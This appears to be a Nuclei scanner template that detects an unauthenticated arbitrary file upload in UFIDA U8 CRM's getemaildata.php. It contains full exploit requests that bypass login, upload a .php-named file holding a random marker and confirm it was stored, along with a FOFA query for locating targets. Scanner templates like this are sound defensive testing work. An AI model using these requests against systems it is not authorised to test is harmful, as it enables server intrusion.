id: yonyou-u8-crm-fileupload info: name: UFIDA U8-CRM getemaildata - Arbitary File Upload author: SleepingBag945,pussycat0x severity: critical description: | There is an arbitrary file upload vulnerability in the getemaildata.php file of UFIDA U8 CRM customer relationship management system. An attacker can obtain server permissions through the vulnerability and attack the server. metadata: verified: true max-request: 2 fofa-query: body="用友U8CRM" tags: yonyou,file-upload,u8-crm,intrusive http: - raw: - | POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1 Host: {{Hostname}} Content-Length: 300 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: null Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAVuAKsvesmnWtgEP Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: PHPSESSID=ibru7pqnplhi720caq0ev8uvt0 ------WebKitFormBoundaryAVuAKsvesmnWtgEP Content-Disposition: form-data; name="file"; filename="%s.php " Content-Type: application/octet-stream {{randstr}} ------WebKitFormBoundaryAVuAKsvesmnWtgEP Content-Disposition: form-data; name="upload" upload ------WebKitFormBoundaryAVuAKsvesmnWtgEP-- - | GET /tmpfile/{{path}}.tmp.mht HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "status_code_1==200 && status_code_2==200" - "contains(body_2, '{{randstr}}')" condition: and extractors: - type: regex part: body_1 internal: true name: path group: 1 regex: - '([a-zA-Z0-9]+)\.tmp\.mht' # digest: 4b0a00483046022100e656811347cdd4dda04256a5cda88439ae6fd34b6d69e0c3b063978435ae9a6b02210092c415a317f35ec9f01af48589cb0b2acad5549bc2ab18a1b3399d9fc0a8d0b2:922c64590222798bb761d5b6d8e72950